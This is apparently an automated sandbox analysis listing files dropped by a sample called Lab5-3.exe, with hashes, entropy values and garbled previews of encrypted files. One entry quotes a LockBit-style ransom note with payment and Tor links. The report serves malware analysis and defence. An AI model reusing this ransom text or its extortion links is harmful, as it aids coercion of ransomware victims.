                                                                                                          Preview:..$1.:W...E.].s.%..g...Ic..R...g4.........>..@.$.l..v......E.&&.........i...q.7..r..$.tY,...p....A..n'Q....%..n5.a..K...5.....'....t%.[..G.\|...['..{.JX0.y..@....4l.y.......U4..8V..=..LF.n+.....[-..0-......|X....H..8%./.~7...il..Q...#....".;..K..,^.Pe.......C....".q.IB..C......y>.L^%.l.R.@...D8...Dx.w...k'6k.:..G.._...L..........rc.H..-..2O.&\Do@yY.'S.P..W..dd.r.....y..s.l.H...C...r.P......l/,..lQ...$q..(.#.^....q..&...Wt.y.....Omj........L...r...a..`.....8....sC/n..j....P.qp..ho7.Q....2B%..."..)Z.`.M_.X.g.M....f......p...k...V...K..>a$@..Dq..3..a!....F....c.J..E|...CW....@.{z......\.........b...8.ZK....Gt.........3..>.~...1...i8ia....Jd...:V..r*y%..."/h..XQ..#:.B.DB...Z9.X..GyLn........}CR....o.^.+...&;.V.:Nlr....8KA=..k...r0K.!......Rj.x6I.<Fk.'.x........8v..x...C9.j..jS......QCkS8?$.......GCO..,..{.glD*....F.Z+....2.3..(WC ....C..P.J..imM\.=.l0#._.)L.0m}`4G...x...P*.%..n.f.n.C..lph.T....?....t.`.`/{6.........`.Zx.....5PR.8Fo..y.6I.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2416
                                                                                                          Entropy (8bit):7.924582859883311
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:HvoPl37Ylf88b0hOkVZemTHfUTid3hBaUoSGFcmeykEdEElU92i:HvoNMlf9uOMQhGx0uKeY2ElUJ
                                                                                                          MD5:490F57966077239E6C92B5838DFE614C
                                                                                                          SHA1:19413FD4A7145D1DCF6CCF70ADA095D6887B136B
                                                                                                          SHA-256:F828EC5F4D02F627BB6A6D593C41E9D86F9E46B4BFFA9A0B7E032C840CDC844D
                                                                                                          SHA-512:9144F6B8FEA64F529BCC10B7C86CB6E87AF7D202974B083C7E9A4C6E0EFF2E4B1BBCB9AB01D069492AA30B2BA21FA63E9901A92AE612B86D386A042C3B0CEC6D
                                                                                                          Malicious:false
                                                                                                          Preview:..=.......S.L........+..;97....$=........7R.e.&B4.^.X&Qq...fmfq.`..h..C......5.Y.\....f..S.f(:-....'.S.....Z...V....nGkh.&.=....A5iU...,_.M<H..uI.u...1h.l.. .7.....h4.s.......<.........G.....^...kz....uO....[{.F.Qk....!..yj...~..e.=.......~..vY$.h..N...=..<..\u...B.wX.V.F>,.J....K...pp...U*.!D..i...Ng.d#..NVs;U6..d.^d.=..o...b..m....O.k.\.].~{[.`.....hO-...Y`5r.^.A.-.(..0...3.eu.... .B.:.M).$.gg..."...<.1.]U-.I.n1..a..A..H...lh.;.U..;V....!.J..Z 5..wc.n.......XX..=.Q...L..b....sa.%..X`%...!.B.|......DS-..`..h_xD.HQ..........+.:..S{..z..K.`....l...o.LjH...X.;..z..=.[KE!O[...k...^2^.z..%.*[c..B9.s....CI.6.&1....3.].1.0...0k.....O..Y..R.......H.Y.;..)...re_x..fb...t.e...x...y.QA...4&7...h9....z.....R.;..os.&..... .-...q.c..,...LO...{..Wy0..........5...*.G7..@[.{.o...Ip7..K.|,...#F.q6..a.....M`1$.).../I<...m ......Q..3...J.9fnC.....&.....DV=#.*,.......hT.Q..b.K..."..{(.......5'.aB.Ki...".!...U.[.C.!.[5j2d.....M.{..W..w.:./...R....G..8g..F..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2064
                                                                                                          Entropy (8bit):7.912598160705511
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:EQz1UHnTdz/lkHfUTid3hBaUoSGFcmeykEdEElU92i:EQz1UHnhhGx0uKeY2ElUJ
                                                                                                          MD5:36B9AB0652B1A2F6C28E20222620CAC0
                                                                                                          SHA1:EA3E3379EE782D231DE04CEEF88A081E433144B6
                                                                                                          SHA-256:A345011D2456E42657D464F80D792D175AC0ACBE9AA686DD2884DBADE6F25537
                                                                                                          SHA-512:EEA048E10EB88AE168203D917D26EBDB606F0F534C0563D183E08B2C08FEB357E8F61714BC6515A009B46875DB267CCFAF83042C75B28A54258188781F6AA93D
                                                                                                          Malicious:false
                                                                                                          Preview:..=V..........L.+4.^.....5...v....}9..o.....o.x/..r...6.W....._.*...Z.$....=.-i../(5.........tz.9k.F.}Fh..O...&.N...mv.v.m.AB#;:.i.J...}{^)..w.......[K.}.1......Ub..Q'"\...wi..IC...k5......Y...?X7..Z.........qK6.-..1.$:..Q..I....)......?85..he.?..T.Q..QYTi.:0...^=d..o.-.cl7..,]..m...f.....7....&.[y.+?.!A.....PR.!.\":.El.a.J..1.`$..R.k...gP.L.z(.t=Q...S..... P(.hJ.<.....%.1._.UV\Q. .....a..Mp......jj.!ZA.........,s..gb(..@.f.F.H.q,.c....C....%.........=.O.....fn...Q....w ...]......{s.9.;..R3H.2..8=..JF......Wm.]....!.!.V..\......e,...}e..~B.@...D.&e_\.u...b%...n..o..T[...."....4...'BH.?.;.).....cV".C..O..%....VO;..s7...dI*.&ul......3ALpL...Q.!.y..3...~.YU..zf...e.2S.c.-...qg..s+.-hl....?.......hn..Z{.&.~V.Z$gp.i\8.*..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2336
                                                                                                          Entropy (8bit):7.925993213522468
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:M1tonljazedEc0Ofn/U1HfUTid3hBaUoSGFcmeykEdEElU92i:Mjolycfn/NGx0uKeY2ElUJ
                                                                                                          MD5:461DF05CE9A44EC9087130BAFF311A20
                                                                                                          SHA1:DEDCCD8907351EC3AA6F39431B80CFBDFE00599A
                                                                                                          SHA-256:53347283255C852E14E51ED770A6249D72CD84A82224D7BD4578107FDF2B9E9F
                                                                                                          SHA-512:F0AD9CD419151830B95BFA782215E32AF451D365AD1769C8DAECB0E84134EBEF770AB05EE699DF9660F3F5169C69A53FA817B6C81043A78B1342594E6B06BF68
                                                                                                          Malicious:false
                                                                                                          Preview:...[3>~.......p..@..R...c..H{A._.3w..;}.........J=..w.H..7..p-...2R.G}...........Yx.e0....F.H]..d.d{.....;..g..Q.n.g...k?w.%).......-.6..%Tm..*..... .$w/.\E...'{.|.h....k........O....H~N...B.'.5...D*.....e....? ..|...n.y#...$:.4!./.....a..93.g.U}..9..x..2b....)....(K._......m.Q...L.}...0=1....x.t.:..z..[.*....Q?..W.X).F..~2.f&..7...p..]........!..U...J..m.S......e.^....o..8.e..+..z[..........|.U.>..Q.S.\...W..r.&....x...fG..fA.....d...f...v.g.!e.J.j....S.....!X..P8(...9.....b"%.e....a.......v..d..G...W...2.N..B...@.....,.........u..&..EE..e.a...h3..A!.}........|..../......T.%.FRZT..,C....= i.....i.$..S...pGSm.]R.._$]|..(......P..9.C._...*.V.e.W.e..E...+lR...M)..@X!...`~T.&...G...n.W+cs.......G|.F..M..VYC;.#.L..X......x.e.:8..+.%....]Rme.....7.7.*1...Z.)q.u.`..)#......s........6>c..g.)...Fp..DRt..8.qNV.H.i5..7.%/.'..W?xR2Q..BB:x.y..P....5.;.e.=...l.G...?.z...-@.`u...m..`.-....].... (R.@....&....y...(......... f.6!..y....YZ...#
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2672
                                                                                                          Entropy (8bit):7.929638435497639
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:402d0AEEJ35r/r0b5nMrDRJa7mAju6V5xArHfUTid3hBaUoSGFcmeykEdEElU92i:4fd7Eo6FMrNJ0mAjHA4Gx0uKeY2ElUJ
                                                                                                          MD5:E8BF6FCA77C5E29697AFDDE96151011B
                                                                                                          SHA1:948AC73F8F9FC1D4B29323B8A031A90BFE18D9F2
                                                                                                          SHA-256:101B926ACCDFDDBAFFA160DBF55DC657DB5AC6A304E2DEF052CFA6F9DC04E20B
                                                                                                          SHA-512:21142F3F7067CD4D545ADEC72CB84892C4E6CE7B17FC0107996137B4C21460F920FF19EFFE780829EFBE199A74C6D55611E1BEBCDB85A6B18A96EDBF90529A41
                                                                                                          Malicious:false
                                                                                                          Preview:o.$..D...B.Z....f....n.".{.B.0R6.E#...|..}..........L)_..+..".)p8G.....D....&..M....4N.%.?.*...wc....T....I........'.y.T..O.ps.....J....eS"...;=.wl9g..6.....p....~.%x.gI..rl..ToB.....q...r:..*.'.B..)D.g.}..G3.,...<..._..R..^...D..qf....*.o....>...T./>..a.a..^.zu....5.J..'-#.....$.)!>...$.....T /v.......us-J4...c..F.q..vCHr'.s...Z.q.N:|...qU.....d.........{0+...w.b.d...1s..m.xXt..G.%.HW*.....Wq.e3..o...q...>.....#.#H...jZk.(].....)*<.38C6..'6.Dh.`.../(..A........kSe..~8#C.......U..=JK.L....8&"i.=.j....w.|c.j.e.....H.Z..q}....A.Gf.....n....B.r:....G.P...@. .*.#.z...N3.g..m!B...OE.`D<...L9..:..i.X.S..4@....W.2{....8...m..........Q.e.......<..'..~..[...n..}r......Ws.u.../.Ze....b.xC.\[...S...p.........V>.!\+\.|..f..e.R...#X...F.:b)M7|.F....f_.=.A.Ivw=...g.-.....(...(..;.1.?.!l....2....W<..d4e.E.....!.22...x$...!.".Z..z.P..'.P.g..v.$.f./2.i5T`1.IN.t]fae....0~.......21V...T]...n.%..k>$.@...,E4~ d!t.'..R.2._....#...O...XD..i._.IO.r...Tsm...M..Z.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2240
                                                                                                          Entropy (8bit):7.901604288615262
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:cJrl0G7sI1fAxHbPHfUTid3hBaUoSGFcmeykEdEElU92i:2sufO7UGx0uKeY2ElUJ
                                                                                                          MD5:40E1E0BA22E9DCA92FA9A9B5CCDCCF36
                                                                                                          SHA1:73E74A699424B99150CD8D3401B38D141460BB1B
                                                                                                          SHA-256:F2FE65C10878BFD4C051D784CC70A7E67C01D01F31E9D1A6BA1A8EA9D1FD49EA
                                                                                                          SHA-512:F4F0E04ABC8D9C5DF4F339ADAF8B443FEAAFFD16BBA4F526C2A3A6907AA3CFCA1D88625DF4F5410ECB04805FBEE33A2C9C28A7049268BF0B0B72F4DD712B6923
                                                                                                          Malicious:false
                                                                                                          Preview:....W../...4.....f.....l...A$..L...(..\.~.$..uN.8O.2..6K......^..._...x........M-.X..S{.......,...TG.Ag.He..8.....>..f .....u.X*.....%.].\..j.8.:)..]Q.@...hT......#^.u.....1...\..^..zL.iQa.#%.g..^........(?,GC.8....xG.U..Mh.w..`p....B`......Y.}....p.E....U..98,*..K.v..?...,.?.I....^.tE.!!p.....F...r.PzW)............c.m1..... .~..7...r.B........^@....._b..a...l.........`9$.<u...]n7_....l...I.Tog....m.?...QD..H...A6_.$V..>\....,L$...\)$..N.L....; f....Z.....*.7..U...CF.y.....A..D...K..gx..B.H....5.\..>.x....2[...)...Mj.uLJH.s......._.cW.u....IHB...F.\...v.........P.>.X..$......k.(.k.-....CZ......k-l..w...*...._..L]....\?.k/lv|..Q.......o..r...m+..P.r/.x......%.se6f...9:p...D.{.,.3Ou...bY..stn.C.4Q.x.........X{.~I.....n.s. ..v.l....Qz`...jY....a....'..+[.I..kN.:..C.....g....3.....@y...".@.K.^.....}wSmj.n.......1.......6..g)..^F.....'.p.........t.......F...;m]cz....I..$.......x..P.....^.Q...rp....;....M....R...=(..(ch.s:........Q.V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2256
                                                                                                          Entropy (8bit):7.924693935014922
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:t0w8TtJ1yiKuI3XHfUTid3hBaUoSGFcmeykEdEElU92i:OTtJ1yvuI38Gx0uKeY2ElUJ
                                                                                                          MD5:AE33720F6E7B1B3ACE651D14B5B23A93
                                                                                                          SHA1:2F06FE6B51633F8AF6DF6418CE347D064CE667DA
                                                                                                          SHA-256:DE0975700C3AE28EAD42BAA541589140CEABF37E36AF593CAD4D3A19BAA6503A
                                                                                                          SHA-512:B2B6748B58E0B2C651770C2A684247D8AD0CC75780EEB6A8284663093BE2E159A14856A0145E3690063FA8D5020B23D06AC4BA4875C97556ACD441DBC9DD89D5
                                                                                                          Malicious:false
                                                                                                          Preview:.D..w.sl.6/v....I.........5...F.r..K.......f..'..T.+...~N.."..../Ro..c+Z..;..4i..,....b.7f.........*..U.B2v.4..}..R."?".#..u..&.y/Q@..O.=1G*a4..F..M. ...:..r......9.....F.8C....... "....nk]..q...7..i.2.}.W.'Q.gTV .W./).H..\..Z.<.:..?.._Y..\...K........R.q.....j..$.n.Q...n1..l.......Z.=.o.\....B4;..4_....J...M..A7.8..2O.1.......UKSR..N...T.4..dj.........'..gm..... .j....,=c..G.........`.......47#O.Jv...t......>.k...d...M.M..`Q...C=.o#3qg...^..t....O]MB)4..-f....D<.=.zE..h..d.a..F..d..B.............t..r+....t..N......N..".8..K.gM.\%j. .t.&.i.]7..t.AADu9.N..(.(..h.'.b.Z....P..@.<.....H\X.Tt.(.i..h..>;.^<z.II..... .....t^.{...o.&H^..P>..H....[+.....w..-Y.R..{...gU..........Fi..`.M;...Uu.B..(:..-'...p......~.........M..8.&>.5..;y`.Z.o.V..L...j.C.c..2.U..a.8Zi.5QQ3.[.4;X~. .'.......G..j..E..-=. D... ..r9.l.C.^..,g....9c.W.N..1.m...'g~.....(_q.n..BXy.s-....?.|._..N..'e.$.!..NiK<7..!.....Ol.5:#]S...un.h.3..^.Q...rp....;....M....R...=(..(ch
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2064
                                                                                                          Entropy (8bit):7.911225810176902
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:l6VJEAMEEpQnfSDSrtiXzHfUTid3hBaUoSGFcmeykEdEElU92i:lfAvZ6ekXAGx0uKeY2ElUJ
                                                                                                          MD5:2BC0C40FD8BA6E561AE67843006638EB
                                                                                                          SHA1:0545D9A7A8D2FDEEB96722912607C4C8196C022E
                                                                                                          SHA-256:93F9B11C9B964CD7AF788F8351639A91A0E8CC6833735282095BECD5E65DE85F
                                                                                                          SHA-512:2EB11626D659D46C6B8FA8BA64D68C62F2EC7EF06F7C13C2D13E37BB7A6050BD1345D7D58366ADDC624AA907571ACDECFDBAB6A5869FF24C09FF92F484BE28E3
                                                                                                          Malicious:false
                                                                                                          Preview:.,.......j...^.~V...1....{..t./.Y.g.....}......z6#..^..J;..OR.N.jO..d......S..O....X..1FF...+.......>.u.Xo.lh...R..8.......^...=d...0_]rf`p.......K>..0....qT0....i...8"..Y.)..P.k.Gb..T.|...&.e..[l.t....2..+..eF....9.U...wX.d..........A......-.Eq....R....-8..K...T.....K...dI.$..J.Al............&H[.%....U........q...r...JT..#-....E..D.......o/1.../M.}...:...t./....0..>.H...%.P......Z.#P"lJ/P.y}...}#/.t..w......D....6<.%1.(s^.&...N.q....A~-\.U..J.....h....!....H.. .....z...A..!.5...}......z...BT.._A....}.P....J....j....v.o;1G..[.y.e.xkGQG7.p.2..X...x.Z./....-..Y.....(s+..+..;...~G..Y..).&b..e;M..67.%2.+..P:.....,.<....>.]../M.c.....o.....}wRe..[oA.taU`j......~4(...:.6...eR......q..;w.I.N.3....o..._.3...6.n......\....R8a..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2912
                                                                                                          Entropy (8bit):7.939564451106469
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:mizO8QkuyfOpQkTeMZKaJoAI3bjgHfUTid3hBaUoSGFcmeykEdEElU92i:mizOfkuMOWEeMvJtePGx0uKeY2ElUJ
                                                                                                          MD5:E0F25C56F9BEE52540F4B301A22EC8D5
                                                                                                          SHA1:8D01813FCE9E1E8AD41F5B3572582218B224AB25
                                                                                                          SHA-256:591D992C864EFE1CD80E6B8C7AECD663CC87C6C2B5EB6F38BE3DA2A31FD0EDBF
                                                                                                          SHA-512:5AF4852D7F326529A656870BCDFA7704C7C8E45FA759BA6D29088F69ADD65338C198A1F38AA6D475F87E348AB48F01CCB558FF036A0E10320D9B8729291AA35A
                                                                                                          Malicious:false
                                                                                                          Preview:|...5I| ..s....#W.p.9.<f.fB...&...#?..(.....wx{=.0..re.EE7..U..)k..k....).|....&..[*n!.....J,|..=Ks.=..&..,.....fR.H....;.x.`..R.G..a.2....fY.T.......@..._.O.zD.j......8\>.I..5...5yf.v~.`..O.<.%.~`..3.....o....j....X..<F......Q...K...l..$..g.....eJ.e...J._0bo..4...@..];..j...Y.d.d>..9q..XH>.c..h...8.}..-.;.......j...^.....w.X..\Ij..H.."}.....Q^..k..@/.m..E.n.E...w-...[g....lP.m[.5.......j..Z...".T..\...2.....4.......\....rm.....;!......H~#>.#.......!..+.....e,..0...K}rU....'.7&Y.g...2....P....(.h.;I;.....Z}.\..BKo5..6.lkF."ZP)....c.......M.,.G.O!..Q...z.J.8...l.6..~w,..2..0.XR.@.bV.)...I.+6.O@4<.GA.G.M.<..^..F.2+;..........U...z.k....uK.eU..*...#.%R78..D,..e..t..C.R'M5Li..$W....D.Q....j`w.....dp..4.{..8Z..HB.9.]<..NZ.P..S.~`3h.....Cy...5*..B..F(v._|}..G....Z.A..n.....N.m....g.>...S..WQ.d..V.E.....L...iV..8Z;.....iE.3J.CH..=..e.M0..q.......3.M.eX.....`....V..)/$.Eo.7...D.UR...]..u.....Z.T........c.i7.jr.N..+.B.w..&.}K.Q.E8g.G.N..p......%.D.\4..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1920
                                                                                                          Entropy (8bit):7.905801301859884
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:CAdB1MO2Qcs/HfUTid3hBaUoSGFcmeykEdEElU92i:CYB1fcsEGx0uKeY2ElUJ
                                                                                                          MD5:8BE48AB0F076C58993DA35475C4FD668
                                                                                                          SHA1:6DA6A866A9270357CBFFED3E70627CA9BE7583E7
                                                                                                          SHA-256:DA3D711788C0DCAE303AE2F95966A838DA552D27FE0A50B8678C9D8FDDD23224
                                                                                                          SHA-512:E9B81D363E6765D87C8C2C291777374DFCA55E8152D41A2A4EBDB96CDA69F8AF8000930215D5FC9D5FCBF831D17A294E34E2AF2FD1FB4BB5B037E07FE9D54277
                                                                                                          Malicious:false
                                                                                                          Preview:A.4[.....v.]./j..r.-m.QF<.......M...q.4.}>k+t.7].b....Z.!e..%..]*6....&&...>GZ.f.b..h.G.D.k.?...I.T...3~....y...Z...Xaqy...]...G*.Xce...\.WT.u"...:o.a......-."k......I.&.9L....i...T.z.{.qn.(...\N..l.......G.t*....::Ov..k.^.."$.$VrF.9+.?..=..v\.q.v..=.!'......U.v9|.b..`V(.......'.0V.......Y....i.J..Kr5...P,.....VL......a-S.+...q.=.L...6B0.;......0.....mn...`....'N.T-.....Gb......{.D...d....lu.V_.k..(....K...4......w.Fj.....O./.0..r..W...6.g.I".=.5).yDk.........jz96......m...p}~8..g.....K.....t.i0b.A....5.B/.z67J%.R.:..3..y.z.W _..F.K1/^..../.ed+`...... ..c.OL.e.........p~W..L.2.u.)OQ...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3984
                                                                                                          Entropy (8bit):7.956629073029834
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:AKNHg/VOYbuELLoFSMQHDRGx0uKeY2ElUJ:AIHyXbufSnDq0Cb
                                                                                                          MD5:DBF27B492B87E8DBF2C9A4918630B664
                                                                                                          SHA1:0FBBFD659377DA80AF41DDE281C19AFEB9CFC7C9
                                                                                                          SHA-256:C281C73D2F6F57E67048E7D8005E361984632D3363A224525BA41203890CE452
                                                                                                          SHA-512:6C8B33158E672500018DD1720EFE7B13FCFEC1EB4F80CCD28FFFE0777E19E126F4960EB9359EE6073C9CB60637770DA456F1AB337955B0D366E9CB6D987BBC8D
                                                                                                          Malicious:false
                                                                                                          Preview:.. ,F.......&j.P.].W..X?.l@.?......u...7.|..i.. ...~0~;=5.2H..N{..7.$.G...M.R...v..z....S...9.J..6T..mnv..%{..9....yI....Ak.......J5.............d....nz.......C...k.v......g}... ....y....p..r._.O.&.E.~...8,._iQ........._..C~.i....v_..~91...:..s.vW..Y..+..R..}$.b.IC<...{..Hi9........>...=..n..XE.....{A.UJd..1U..5.w=..K..+...e..Q.M..1f..'..c...H...|....ee..E..vB.....h...7ZHD.....6A%.Fn.U.i[....p5{c^.rG).J....S'R.0#$.D....sW...=\.K#......eh....u..c.=Jw.j.>\.[.....:z...&$...`.. .V_..%J....7.".....M:..\>e....../&V..)..x.h9.K>.t..r.:..Z/....W.B...q......H.x:kUN.NE..v.."P.[b.W.4EZ.^..n+.....7O.....&...$.g..".(..4.rT...R......N.$D......X..8.. .....V..Dt....E).R.,VYV..A..3Vu.N.....+>......D.B.r..5.Z.~..c.r8.D.r\..........Wj!.-.y=]....@.7l.......)..`.V6p..Z...5B.7r.7..{.C|.r~.7......Rg...k.)v.0Frj...m.A'...a.3>.l)A..P>.k.E..9.0.T.... ..?.Y.m;c.nF.....5(v...@8...;.r.#.8.aO.5Z:..[...........<f.I.P.kSU...7....6..G[.{c...b\..........D&<9.....L.`...0...k..-t.I.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4464
                                                                                                          Entropy (8bit):7.9587268897755115
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:LRC81dxySI+ZXa4L1tgHaMTJTcUOCGDnO0avl1RDAaVMGx0uKeY2ElUJ:VV1dwSIcaM2zxHGDO0yaaV/0Cb
                                                                                                          MD5:15FCB91D33A632E25C4444BA173C434E
                                                                                                          SHA1:242227980F3E0E02082E911D830B345AD39A7C2D
                                                                                                          SHA-256:AC8E21B9D303FE14C3387DD3EFB90F15B3AAEDF0DFBBDF9F4562393EE52B0ADC
                                                                                                          SHA-512:51EAD24E6C43AD924DED6A4EA1186E52000AA03AD21A5D1321AEBAEFDB51495F6B0861E6664346F94FC8EAF12E90518D2896341BD86B0C81597C28E00DBCABD3
                                                                                                          Malicious:false
                                                                                                          Preview:.A.Q;.....Q..t..V..$".|.....Uc.+...*....a..p...De.N#.........f.....I.vji..n.....H.D'...D8.2\(k.28p$..h....2.0.yb...f.;..j....`+.E.....p...:~t+-V......q._.p......|...].Z.8iR....iK._.i,.g..%.S.>).....mV.^.*...4.|..(Q0".7.Z.|_.S...@.....:Wr.|..%..p.J..3,h..".\.c.o..B.7..o<...U...&.d7..F.].T.........-z..S..Gs.<:..F..i+......+.m02.U.S...</i.W.....C.z....Q[.1O...)b...jW..T.x./....Z.5.U....A...J...;. X...l..i......I.....U..)..S.n..@0..oK..E|..Z.q@.......e4<~d.~...Q.@.lZ..D..c..q.'.[.....Q.{}.C....Ye/...?..uj...../!.[.....A..W..ULv(..I...[p.W..7..;4..q6...&?..o....n...........(...J.....}7.u.S....qH.].bw...5....g3....Z._..f..%..7.....C..T.$.Z..1...k...^..OC...Ai'....^..............f......gZ7@h&..p..#........%k.A.\..,...1b_!.I..s1.4...Hn....C"D2t..=...y......%{r.<.(.%,D:...T. >..........q.9Z..|..$...<..#P.ee...V....D..`..00u.^....P+..j.c.Y.O7+#...'t_............I...f..7.x.;/GH....q...5ch.)H.3......[..z.X1Dm[..].G.k.^..p...j.RID...q}.T../..1...R...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5488
                                                                                                          Entropy (8bit):7.968755278741522
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:tcimH4hy0N+cgX3MJJys4pqK9nk70pg/DsjhQATGBxdlGx0uKeY2ElUJ:tHhHNwgyBlp0YQCGDd+0Cb
                                                                                                          MD5:289BC7D74F6B065344EA4862C88FB925
                                                                                                          SHA1:B675484D9886C8247903CF07C2F3D3AEEE09E39E
                                                                                                          SHA-256:06F353DFC11794C268BC1A87898EB9697531222FB71E7509BE82062F59E1C184
                                                                                                          SHA-512:476144F57BEC001DCF4F5E587AA777A3DDCC94478318FA74FC246F870032757D2D6FB3AB2E395D030AFFE08C3E940572BBA3D9D84FCC1868D932BE02D566428C
                                                                                                          Malicious:false
                                                                                                          Preview:l%.....O8..[.P(.e.\.cRm9MC...W..........Y.5QG............8...a..[.w....M..T..[....L...&..Tq......5.=.K....A.q.i...AHO.!..(....gT.6a.+...2t.N.!......p.{..K!.......^.....J4..0".M...FL.I+!0.T.D..a...!.....U.x...&..A...H..V.+s..Z.%.7..`.....T...4..&TA..F....l.h.D.XR|.....Gj..Aw...C..>.....J..J..XD.3.m.2.W"....I...(t..|.OG...<...Q!.d..?0..:%.............CE..W*......../K..p.D..XP...Y..>.._bR.n..I..BX1...`%..N.....D....\2\S...+..}....<.1.7.).YmE../.lu}].Tu/..E...Z....58....O:.D..S2...s.Zi.53.......?....C:..b......b......#(..>.q....I(.5.y.z...n.G......s...4....e.S......l...t....R.... .....5...Ky'.....%...-.....&.Xe.T.7s...?0_\)Q......=.. u.P..\..1.v..C...X.a.i...~*../..`4...H.h%....H..#:$..&W&...r6%....Z...>...o^.P_.....]<I.....2e.x......x."..ol.e..-.].H........B.h..$.i.A../..x..M.VAyA4........!t....@....M....l..&x.z.........4k.Jc.{..l..Z.P.na.4...7....{.v+_...2.I....h_.....|..OgA.....+S.. g.9../..Qx.`.p...n<.pq..9. $..FP...@n..`.^A)}.B.,..ru.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3616
                                                                                                          Entropy (8bit):7.949766099433737
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:UC0NdbTao/PaL8ShLh5P4Gx0uKeY2ElUJ:1CSou8Shj0Cb
                                                                                                          MD5:D2D5A6198536ACE71298299EAE22EACF
                                                                                                          SHA1:DFDB45E86CA40344336B07AFC358E386FDC92FFA
                                                                                                          SHA-256:45BF53CCE151EEC1E4B3964D4F08E744BBD7A4A4EE78A8EE9FB12063F08A6B38
                                                                                                          SHA-512:3222DCEC547FBD5BB1BB1A74282BED553ACEEF5FD6B3835600FB2AF7D94DFC620641292F7297579A7E6644253538CC3E90AC5C2E104000570E4039DFCE6E9C03
                                                                                                          Malicious:false
